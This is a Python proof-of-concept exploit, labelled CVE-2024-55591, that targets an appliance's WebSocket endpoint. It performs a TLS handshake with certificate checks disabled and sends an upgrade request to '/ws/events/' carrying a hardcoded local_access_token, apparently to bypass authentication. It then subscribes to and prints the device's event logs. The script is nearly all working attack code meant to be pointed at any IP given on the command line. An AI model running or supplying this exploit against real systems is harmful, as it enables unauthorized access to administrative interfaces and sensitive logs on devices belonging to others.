#!/usr/bin/python3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from uuid import uuid4
from datetime import datetime, timedelta
from pwn import *
import requests
import random
import argparse
import ssl
import socket
import threading
import http.client
import re
import urllib.parse
import time
import hashlib
import math
import random
import string
import struct
import subprocess
import json

# Suppress urllib3's InsecureRequestWarning for unverified HTTPS requests made
# through ``requests`` (no ``requests`` calls appear in the code shown here;
# the WebSocket traffic below goes through the ``ssl`` module directly).
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Default target; main() overwrites both from the --target/--port arguments.
HOST = "192.168.182.188"
PORT = 443
# Fixed GUID from RFC 6455: it is appended to the Sec-WebSocket-Key to derive
# the Sec-WebSocket-Accept value the server must echo (checked in
# create_websocket).
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


# TLS settings for the raw socket connection:
# - set_ciphers restricts the TLS 1.2-and-earlier suites to
#   ECDHE-RSA-AES256-SHA (it does not affect TLS 1.3 suites). OpenSSL's
#   "@SECLEVEL=0" suffix lowers the security level so this legacy suite is
#   still permitted.
# - MINIMUM_SUPPORTED allows negotiating down to the oldest protocol version
#   the local OpenSSL build supports.
# - Certificate and hostname verification are disabled. Presumably this is
#   because targets present self-signed certificates (NOTE(review): confirm).
#   check_hostname must be cleared *before* verify_mode is set to CERT_NONE,
#   otherwise ssl raises ValueError.
# NOTE(review): this rebinds the name ``context``, which ``from pwn import *``
# may also export; the SSL context defined here wins.
CIPHERS = "ECDHE-RSA-AES256-SHA@SECLEVEL=0"
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
context.set_ciphers(CIPHERS)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

def create_ssl_socket():
    """Open a TCP connection to HOST:PORT and wrap it with the module TLS context.

    Returns:
        The connected ``ssl.SSLSocket`` (the TLS handshake has already run,
        since ``wrap_socket`` is called with its default arguments).

    Raises:
        OSError: if the TCP connection cannot be established.
        ssl.SSLError: if the TLS handshake fails.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((HOST, PORT))
        return context.wrap_socket(sock)
    except BaseException:
        # Release the descriptor instead of leaking it when connecting or the
        # handshake fails; closing an already-detached socket is harmless.
        sock.close()
        raise

def try_read_response(sock) -> bytes:
    """Read an HTTP response header block from *sock*.

    Reading stops exactly at the empty line (CRLF CRLF) that terminates the
    headers. No byte that follows the headers is consumed, so data the server
    sends immediately afterwards stays in the socket for the caller. An
    example is the first WebSocket frame after a 101 response.

    Args:
        sock: object with a ``read(n)`` method returning bytes (an
            ``ssl.SSLSocket`` in this script); an empty result means end of
            stream.

    Returns:
        The raw header bytes, including the terminating CRLF CRLF.

    Raises:
        RuntimeError: if the first read returns nothing ``max_count`` times
            in a row, or the stream ends before the header terminator.
    """
    count = 0
    max_count = 10
    # Retry the very first read a few times before giving up.
    while not (headers := sock.read(1)):
        count += 1
        time.sleep(0.1)
        if count == max_count:
            raise RuntimeError(f"Unable to read response headers: {headers}")

    # Read one byte at a time. Larger reads could swallow the beginning of
    # whatever the server sends right after the headers.
    buf = bytearray(headers)
    while not buf.endswith(b"\r\n\r\n"):
        chunk = sock.read(1)
        if not chunk:
            raise RuntimeError(f"Unable to read response headers: {bytes(buf)}")
        buf += chunk
    return bytes(buf)

def upgrade_http_to_websocket_req(sock, path: str, websocket_key) -> bytes:
    """Send an HTTP/1.1 WebSocket upgrade request for *path* and read the reply.

    Args:
        sock: connected socket the request is written to.
        path: request target, including any query string.
        websocket_key: value placed in the ``Sec-WebSocket-Key`` header.

    Returns:
        The raw response header bytes as returned by ``try_read_response``.
    """
    header_lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {HOST}:{PORT}",
        "Connection: keep-alive, Upgrade",
        "Sec-WebSocket-Version: 13",
        f"Sec-WebSocket-Key: {websocket_key}",
        "Upgrade: websocket",
    ]
    # Every header line ends in CRLF, and one extra CRLF closes the block.
    raw_request = "\r\n".join(header_lines) + "\r\n\r\n"
    sock.sendall(raw_request.encode())
    return try_read_response(sock)

def generate_websocket_key():
    """Return a fresh value for the ``Sec-WebSocket-Key`` request header.

    RFC 6455 section 4.1 requires the key to be the base64 encoding of a
    16-byte nonce chosen randomly for each connection. The bytes come from
    ``secrets`` and span the full byte range, rather than only alphanumerics
    picked with ``random``.

    Returns:
        A 24-character base64 ``str``.
    """
    # Local imports: base64 is not imported explicitly at module level.
    import base64
    import secrets

    return base64.b64encode(secrets.token_bytes(16)).decode("ascii")

def create_websocket(path="/ws/events/?local_access_token=a5a5a5a5a5a5adasda8sd8sd8ewerfgfg"):
    """Open a TLS connection to HOST:PORT and perform the WebSocket handshake.

    Args:
        path: request target of the upgrade request. Defaults to the
            ``/ws/events/`` endpoint this script has always used.

    Returns:
        The connected socket, ready for WebSocket framing.

    Raises:
        Exception: if the server does not answer with status 101, or its
            ``Sec-WebSocket-Accept`` value does not match the key that was
            sent. The socket is closed before the exception propagates.
    """
    import base64  # not imported explicitly at module level

    sk = create_ssl_socket()
    try:
        websocket_key = generate_websocket_key()
        response_header = upgrade_http_to_websocket_req(sk, path, websocket_key)
        # latin-1 maps every byte, so an odd header byte cannot crash decoding.
        lines = response_header.decode("latin-1").split("\r\n")

        # Check the status code rather than the exact reason phrase.
        status = lines[0].split()
        if len(status) < 2 or status[1] != "101":
            raise Exception("WebSocket handshake failed!")

        accept_key = None
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            # HTTP header field names are case-insensitive.
            if sep and name.strip().lower() == "sec-websocket-accept":
                accept_key = value.strip()
                break

        expected_accept_key = base64.b64encode(
            hashlib.sha1((websocket_key + GUID).encode("utf-8")).digest()
        ).decode("utf-8")
        if accept_key != expected_accept_key:
            raise Exception("WebSocket handshake validation failed!")
    except BaseException:
        # Don't leave the TLS connection open when the handshake is rejected.
        sk.close()
        raise

    print("WebSocket handshake successful!")
    return sk

def parse_websocket_frame(frame):
    """Decode the WebSocket frame at the start of *frame*.

    Args:
        frame: bytes-like buffer whose first byte is the frame's first header
            byte.

    Returns:
        A dict with these keys:

        - ``fin``: the FIN bit.
        - ``rsv``: the three reserved bits as a 3-tuple.
        - ``opcode``: the 4-bit opcode.
        - ``mask``: the MASK bit.
        - ``payload_length``: the length declared in the header.
        - ``payload_data``: the payload, unmasked when the MASK bit is set and
          cut to at most the declared length.
    """
    head, length_byte = frame[0], frame[1]
    masked = (length_byte >> 7) & 1
    declared_length = length_byte & 0x7F

    cursor = 2
    # 126 and 127 are escape values: the real length follows as a big-endian
    # 16-bit or 64-bit integer.
    if declared_length == 126:
        (declared_length,) = struct.unpack_from(">H", frame, cursor)
        cursor += 2
    elif declared_length == 127:
        (declared_length,) = struct.unpack_from(">Q", frame, cursor)
        cursor += 8

    key = None
    if masked:
        key = frame[cursor:cursor + 4]
        cursor += 4

    payload = frame[cursor:cursor + declared_length]
    if masked:
        # XOR each payload byte with the masking key, cycling every 4 bytes.
        payload = bytes(octet ^ key[idx % 4] for idx, octet in enumerate(payload))

    return {
        "fin": (head >> 7) & 1,
        "rsv": tuple((head >> shift) & 1 for shift in (6, 5, 4)),
        "opcode": head & 0x0F,
        "mask": masked,
        "payload_length": declared_length,
        "payload_data": payload,
    }

def _read_exact(sock, n):
    """Read exactly *n* bytes from *sock*, looping over short reads.

    ``SSLSocket.read(n)`` returns *up to* n bytes, so one call is not enough
    for payloads that span several TLS records.

    Raises:
        ConnectionError: if the stream ends before *n* bytes have arrived.
    """
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.read(n - len(buf))
        if not chunk:
            raise ConnectionError("Not valid websocket data!")
        buf += chunk
    return bytes(buf)


def receive_websocket_frame(sock):
    """Read one complete WebSocket frame from *sock* and parse it.

    Reads the 2-byte header, then any extended length field, then the 4-byte
    masking key if the MASK bit is set, then the payload. The assembled bytes
    are handed to ``parse_websocket_frame``.

    Returns:
        The dict produced by ``parse_websocket_frame``.

    Raises:
        ConnectionError: if the connection ends before a full frame arrives.
            Previously an Exception object was *returned* in this case, which
            made callers loop forever on a dead connection.
    """
    frame = _read_exact(sock, 2)

    payload_length = frame[1] & 0x7F
    if payload_length == 126:
        extended = _read_exact(sock, 2)
        frame += extended
        (payload_length,) = struct.unpack(">H", extended)
    elif payload_length == 127:
        extended = _read_exact(sock, 8)
        frame += extended
        (payload_length,) = struct.unpack(">Q", extended)

    # parse_websocket_frame expects the masking key to be present when the
    # MASK bit is set.
    if frame[1] & 0x80:
        frame += _read_exact(sock, 4)

    frame += _read_exact(sock, payload_length)
    return parse_websocket_frame(frame)

def generate_masking_key():
    """Return a fresh 4-byte key for masking a client-to-server frame.

    RFC 6455 section 5.3 requires masking keys to come from a strong source of
    entropy, so ``secrets`` is used instead of the ``random`` module.
    """
    import secrets

    return secrets.token_bytes(4)

def send_websocket_frame(sock, payload_data, opcode=0x1):
    """Mask *payload_data* and send it as a single final (FIN=1) frame.

    Args:
        sock: connected socket. ``sendall`` is used so the whole frame is
            written even if the transport accepts it in pieces.
        payload_data: payload bytes.
        opcode: frame opcode (default 0x1, a text frame). Only the low 4 bits
            are used.
    """
    payload_length = len(payload_data)

    first_byte = 0x80 | (opcode & 0x0F)  # FIN = 1, RSV1-3 = 0
    mask_bit = 0x80  # Mask bit is always 1: client frames must be masked

    # The length is encoded in 7 bits, or escaped with 126 (16-bit length)
    # or 127 (64-bit length).
    if payload_length <= 125:
        header = bytearray([first_byte, mask_bit | payload_length])
    elif payload_length <= 0xFFFF:
        header = bytearray([first_byte, mask_bit | 126])
        header += struct.pack(">H", payload_length)
    else:
        header = bytearray([first_byte, mask_bit | 127])
        header += struct.pack(">Q", payload_length)

    masking_key = generate_masking_key()
    header += masking_key
    masked_payload = bytes(b ^ masking_key[i % 4] for i, b in enumerate(payload_data))

    sock.sendall(header + masked_payload)

def main():
    """Parse CLI arguments, open the WebSocket, subscribe and print frames.

    The loop ends when the server sends a Close frame, when the connection
    drops, or on Ctrl+C; the socket is always closed on the way out.
    """
    global HOST
    global PORT

    parser = argparse.ArgumentParser(description='CVE-2024-55591 poc')
    parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
    parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
    args = parser.parse_args()
    # The connection helpers read these module-level globals.
    HOST = args.target
    PORT = args.port

    sk = create_websocket()
    try:
        data = receive_websocket_frame(sk)
        print(data)

        send_websocket_frame(sk, json.dumps({"type": "eventLogSubscribe", "payload": "*"}).encode())
        while True:
            data = receive_websocket_frame(sk)
            print(data)
            # An Exception object signals a dead stream, and opcode 0x8 is a
            # Close frame. Either way, no further frames will arrive.
            if isinstance(data, Exception) or data["opcode"] == 0x8:
                break
            if data["opcode"] == 0x9:
                # RFC 6455 section 5.5.2: answer a Ping with a Pong that
                # echoes its payload.
                send_websocket_frame(sk, data["payload_data"], opcode=0xA)
    except ConnectionError as exc:
        print(f"Connection closed: {exc}")
    except KeyboardInterrupt:
        pass
    finally:
        sk.close()

if __name__ == "__main__":
    main()